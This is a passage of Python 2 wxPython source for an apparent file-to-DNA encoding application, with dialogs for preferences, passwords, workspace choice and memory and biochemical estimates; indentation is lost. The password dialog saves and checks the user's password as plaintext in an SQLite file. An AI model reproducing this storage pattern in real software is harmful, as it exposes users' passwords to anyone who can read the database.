#self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
#self.SetSize((500,450))
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = (cur.execute('SELECT * FROM prefs where id = 1').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txta.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 2').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtc.WriteText(string)
string = (cur.execute('SELECT * FROM prefs where id = 3').fetchone())[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
self.txtd.WriteText(string)
if con:
con.close()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select default location to save all your file",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.txtf.Clear()
self.txtf.WriteText(self.savePath)
else:
self.savePath = None
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txta.GetString(0,self.txta.GetLastPosition()),len("x")))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtc.GetString(0,self.txtc.GetLastPosition()),len("xy")))
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),len("xyz")))
cur.execute('UPDATE prefs SET details = "true" WHERE id = 4')
#if not self.txtf.IsEmpty():
# cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtf.GetString(0,self.txtf.GetLastPosition()),7))
#else:
# cur.execute('UPDATE prefs SET details = "None" WHERE id = 7')
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
if con:
con.close()
self.Destroy()
def generate(self,e):
barcodeGenerator.generate(self.txta.GetString(0,self.txta.GetLastPosition()) + "-" + self.txtb.GetString(0,self.txtb.GetLastPosition())+ "-" + self.txtc.GetString(0,self.txtc.GetLastPosition()) + "-" + self.txtd.GetString(0,self.txtd.GetLastPosition()),self.WORKSPACE_PATH + "/barcode/")
img = Image.open(self.WORKSPACE_PATH + '/barcode/barcode.png')
img.thumbnail((BARCODE_WIDTH,BARCODE_HEIGHT),Image.BICUBIC)
img.save(self.WORKSPACE_PATH + '/.temp/barcode', "PNG")
img = wx.Image(self.WORKSPACE_PATH + '/.temp/barcode', wx.BITMAP_TYPE_ANY)
self.imageCtrl.SetBitmap(wx.BitmapFromImage(img))
self.Refresh()
def cancel(self,e):
self.Destroy()
#dialog used to set or change password
class setPasswordDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please Enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.RIGHT ,border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t ")
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(path, 1, flag = wx.EXPAND)
self.hBoxc.Add(self.txtc, 3, wx.EXPAND | wx.RIGHT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password : ")
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(path, 1, flag = wx.EXPAND)
self.hBoxd.Add(self.txtd, 3, flag = wx.EXPAND | wx.RIGHT,border = 10)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use password to keep your data private")
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT , border = 5)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT | wx.BOTTOM, border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform or 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Please Enter your password",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.hBoxa = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self, label = " Old Password :\t")
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'false':
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_READONLY)
else:
self.txta = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxa.Add(path,1,wx.EXPAND)
self.hBoxa.Add(self.txta,3,wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxa,flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxc = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " New Password :\t")
self.hBoxc.Add(path,proportion =1,flag = wx.EXPAND)
self.txtc = wx.TextCtrl(self,name = "hBox",style = wx.TE_PASSWORD)
self.hBoxc.Add(self.txtc,proportion = 3 ,flag = wx.EXPAND | wx.LEFT , border = 10)
self.vBox.Add(self.hBoxc , flag = wx.TOP | wx.BOTTOM , border = 7)
self.hBoxd = wx.BoxSizer(wx.HORIZONTAL)
path = wx.StaticText(self,label = " Confirm Password :")
self.hBoxd.Add(path,1,flag = wx.EXPAND)
self.txtd = wx.TextCtrl(self,name = "hBox1",style = wx.TE_PASSWORD)
self.hBoxd.Add(self.txtd,3,flag = wx.EXPAND)
self.vBox.Add(self.hBoxd,flag = wx.TOP | wx.BOTTOM, border = 7)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
head = wx.StaticText(self ,label = "It is recommended that you use password to keep your data private")
if not 'darwin' in sys.platform:
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.ALIGN_CENTER_HORIZONTAL)
line3 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line3, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBoxe = wx.BoxSizer(wx.HORIZONTAL)
self.saveBut = wx.Button(self,label=" Save ")
self.cancelBut = wx.Button(self,label=" Cancel ")
self.hBoxe.Add(self.saveBut,flag = wx.RIGHT , border = 10)
self.hBoxe.Add(self.cancelBut,flag = wx.LEFT , border = 10)
self.vBox.Add(self.hBoxe, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)
self.saveBut.Bind(wx.EVT_BUTTON,self.save)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.SetSizer(self.vBox)
self.SetSize((570,250))
def save(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
try:
cur = con.cursor()
string = cur.execute('SELECT * FROM prefs WHERE id = 5').fetchone()[1]
if "linux" in sys.platform:
string = unicodedata.normalize('NFKD', string).encode('ascii','ignore')
if string == 'true':
oldPassword = (cur.execute('SELECT * FROM prefs where id = 6').fetchone())[1]
if "linux" in sys.platform:
oldPassword = unicodedata.normalize('NFKD', oldPassword).encode('ascii','ignore')
if self.txta.GetString(0,self.txta.GetLastPosition()) != oldPassword or self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your Passwords donot match or else your old password might be wrong', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your Password has been updated!!', 'Information!',wx.OK |wx.ICON_INFORMATION)
else:
if self.txtc.GetString(0,self.txtc.GetLastPosition()) != self.txtd.GetString(0,self.txtd.GetLastPosition()):
wx.MessageBox('Your Passwords donot match', 'Information!',wx.OK | wx.ICON_INFORMATION)
else:
cur.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.txtd.GetString(0,self.txtd.GetLastPosition()),6))
con.execute('UPDATE prefs SET details = ? WHERE id = ?',("true",5))
self.Destroy()
wx.MessageBox('Your Password has been updated!!', 'Information!',wx.OK |wx.ICON_INFORMATION)
con.commit()
except sqlite3.OperationalError:
DATABASE_ERROR = True
self.Destroy()
if con:
con.close()
def cancel(self,e):
self.Destroy()
#dialog used to select encode /decode while the software starts
class chooseDialog(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
head = wx.StaticText(self ,label = "Please Select your Choice",style = wx.CENTER)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL, border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 5)
self.encodeBut = wx.Button(self,label = "File To DNA(Encode)")
self.decodeBut = wx.Button(self,label = "DNA To File(Decode)")
self.vBox.Add(self.encodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.vBox.Add(self.decodeBut,flag = wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL ,border = 10,proportion = 1)
self.SetSizer(self.vBox)
self.SetSize((300,150))
class workspaceLauncher(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
header = wx.TextCtrl(self,name = "hBox",size = (350,60),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(header,flag = wx.EXPAND | wx.ALL , border = 10)
header.WriteText(HEADER_TEXT)
head = wx.StaticText(self ,label = "Select your Workspace",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head, flag = wx.EXPAND | wx.TOP | wx.LEFT, border = 10)
line1 = wx.StaticLine(self, size=(350,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.cbList = []
if "win" in sys.platform and not 'darwin' in sys.platform:
con = sqlite3.connect(PATH + '\..\database\workspace.db')
elif "linux" in sys.platform or 'darwin' in sys.platform:
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur = con.cursor()
for i in cur.execute('SELECT * FROM workspace'):
if "linux" in sys.platform:
self.cbList.append(unicodedata.normalize('NFKD', i[1]).encode('ascii','ignore'))
elif "win" in sys.platform:
self.cbList.append(i[1])
except:
LIST_ERROR = True
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
self.defaultWorkspace = cur.execute('SELECT * FROM prefs WHERE id = 7').fetchone()[1]
if "linux" in sys.platform:
self.defaultWorkspace = unicodedata.normalize('NFKD', self.defaultWorkspace).encode('ascii','ignore')
if self.defaultWorkspace == "True":
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
con.close()
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.cb = wx.ComboBox(self, -1, size = (350,30), choices = self.cbList, style = wx.CB_DROPDOWN)
self.hBox.Add(self.cb, proportion = 4, flag = wx.LEFT | wx.TOP, border = 5)
self.browBut = wx.Button(self , label = "Browse")
self.hBox.Add(self.browBut, proportion = 1, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.RIGHT | wx.TOP , border = 5)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
self.defCheckBox = wx.CheckBox(self, -1, label = "Set this workspace as default and don't ask me again", style = wx.CHK_2STATE)
self.hBox1.Add(self.defCheckBox, wx.EXPAND | wx.LEFT | wx.RIGHT, border = 10)
self.vBox.Add(self.hBox1, proportion = 1, flag = wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.BOTTOM, border = 20)
self.defCheckBox.SetValue(self.defaultWorkspace)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
self.okBut = wx.Button(self, wx.ID_OK,size = (100,30))
self.cancelBut = wx.Button(self, wx.ID_CANCEL, size = (100,30))
self.hBox2.Add(self.okBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT | wx.BOTTOM, border = 10)
self.hBox2.Add(self.cancelBut, flag = wx.ALIGN_CENTER_HORIZONTAL | wx.LEFT | wx.BOTTOM, border = 10)
self.vBox.Add(self.hBox2,flag = wx.ALIGN_CENTER)
self.SetSizerAndFit(self.vBox)
self.browBut.Bind(wx.EVT_BUTTON,self.onChoose)
self.okBut.Bind(wx.EVT_BUTTON,self.okay)
self.cancelBut.Bind(wx.EVT_BUTTON,self.cancel)
self.isNew = False
self.savePath = None
#This is necessary since we dont want to close software when cancel button is pressed in case of SWITCH WORKSPACE
if id == 102:
self.cancelBut.Disable()
def onChoose(self,e):
locationSelector = wx.DirDialog(self,"Please select some location to save all your file",style = wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if locationSelector.ShowModal() == wx.ID_OK:
paths = locationSelector.GetPath()
if "win" in sys.platform:
self.savePath = paths
elif "linux" in sys.platform:
self.savePath = unicodedata.normalize('NFKD', paths).encode('ascii','ignore')
self.cb.SetValue(self.savePath)
else:
self.savePath = None
def okay(self,e):
if self.savePath == None:
if "win" in sys.platform:
if self.cb.GetValue() == "":
wx.MessageDialog(self,'Please select some Folder for Workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = self.cb.GetValue()
elif "linux" in sys.platform:
if unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore') == "":
wx.MessageDialog(self,'Please select some Folder for Workspace', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
else:
self.savePath = unicodedata.normalize('NFKD', self.cb.GetValue()).encode('ascii','ignore')
if self.savePath in self.cbList:
self.isNew = False
else:
self.isNew = True
if self.defCheckBox.IsChecked():
self.defaultWorkspace = True
else:
self.defaultWorkspace = False
if "win" in sys.platform and not 'darwin' in sys.platform:
con1 = sqlite3.connect(PATH + '\..\database\prefs.db')
con = sqlite3.connect(PATH + '\..\database\workspace.db')
elif "linux" in sys.platform or 'darwin' in sys.platform:
con1 = sqlite3.connect(PATH + '/../database/prefs.db')
con = sqlite3.connect(PATH + '/../database/workspace.db')
try:
cur1 = con1.cursor()
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(str(self.defaultWorkspace),7))
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(self.savePath,8))
count = cur1.execute('SELECT * FROM prefs WHERE id = 9').fetchone()[1]
if "linux" in sys.platform:
count = unicodedata.normalize('NFKD', count).encode('ascii','ignore')
if self.isNew:
count = `(int(count) + 1)`
cur1.execute('UPDATE prefs SET details = ? WHERE id = ?',(count,9))
con1.commit()
except:
print "PREF_ERROR"
DB_ERROR_PREFS = True
con1.close()
if self.isNew:
try:
cur = con.cursor()
cur.execute('INSERT INTO workspace VALUES(?,?)',(int(count),self.savePath))
con.commit()
con.close()
except sqlite3.OperationalError:
cur = con.cursor()
#cur.execute('DROP TABLE IF EXISTS workspace')
cur.execute('CREATE TABLE workspace(id INT,path TEXT NOT NULL)')
cur.execute('INSERT INTO workspace VALUES(?,?)',(1,self.savePath))
con.commit()
con.close()
self.Destroy()
def cancel(self,e):
sys.exit(0)
class memEstimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Memory Estimation",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.EXPAND | wx.LEFT | wx.RIGHT , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a data file from your Computer")
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL | wx.RIGHT,proportion = 2,border = 10)
self.vBox.Add(self.hBox)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
if not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation,the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
else:
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation,the actual\nvalues may vary",style = wx.ALIGN_CENTRE_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
#head.Wrap(440)
self.vBox.Add(head ,flag = wx.TOP | wx.LEFT | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.butOk = wx.Button(self , label = "OK")
self.vBox.Add(self.butOk,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.BOTTOM , border = 10)
self.SetSizerAndFit(self.vBox)
#self.SetSize((370,470))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butOk.Bind(wx.EVT_BUTTON,self.ok)
def onChoose(self,e):
self.txt.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
if "win" in sys.platform and not 'darwin' in sys.platform:
path = paths[0]
elif "linux" in sys.platform or 'darwin' in sys.platform:
path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
length = os.path.getsize(path)
dnaLength = int(5.5 * length)
dnaStringMem = 6 * length
dnaStringMem = dnaStringMem/CHUNK_SIZE
if dnaStringMem == 0:
dnaStringMem = 1
dnaListMem = (((dnaLength)/25) - 3) * 117
dnaListMem = dnaListMem/CHUNK_SIZE
if dnaListMem == 0:
dnaListMem = 1
errorCorrectionMem = 15 * length
line1 = "File Size(bytes) : \t\t" + str(length)
line2 = "Size of DNA String : \t" + str(dnaLength)
line3 = "Free Memory Required : \n" + "To genrate DNA String :\t" + str(dnaStringMem) + " MB\n" + "To generate DNA Chunks :\t" + str(dnaListMem) + " MB\n"
line4 = "Amount of DNA Required : \t" + str(length / (455 * (10.0 ** 18)))
text = line1 + "\n\n" + line2 + "\n\n" + line3 + "\n\n" + line4 + " gms\n\n" + "File Selected : " + path
self.txt.WriteText(text)
fileSelector.Destroy()
def ok(self,e):
self.Destroy()
class estimator(wx.Dialog):
def __init__(self,parent,id,title):
wx.Dialog.__init__(self,parent,id,title)
self.vBox = wx.BoxSizer(wx.VERTICAL)
ico = wx.Icon(PATH + '/../icons/DNAicon.ico', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
if "win" in sys.platform and not 'darwin' in sys.platform:
head = wx.StaticText(self ,label = "Biochemical Property Estimator",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA file from your Computer",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter salt concentration(mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration")
self.hBox1.Add(text1, 1, wx.EXPAND)
self.hBox1.Add(self.saltText, 2, wx.EXPAND | wx.LEFT , border = 15)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter cost for a base($) : \t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price")
self.hBox2.Add(text1, 1, wx.EXPAND)
self.hBox2.Add(self.priceText, 2, wx.EXPAND | wx.LEFT, border = 15)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = " Calculate ")
self.butCancel = wx.Button(self, label = " Close ")
self.butSave = wx.Button(self , label = " Save ")
self.hBox3.Add(self.butCalc, 1, wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave, 1, wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butCancel, 1, wx.LEFT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform:
head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,30))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,30))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1)
self.hBox3.Add(self.butSave,proportion = 1)
self.hBox3.Add(self.butCancel,proportion = 1)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
elif "darwin" in sys.platform:
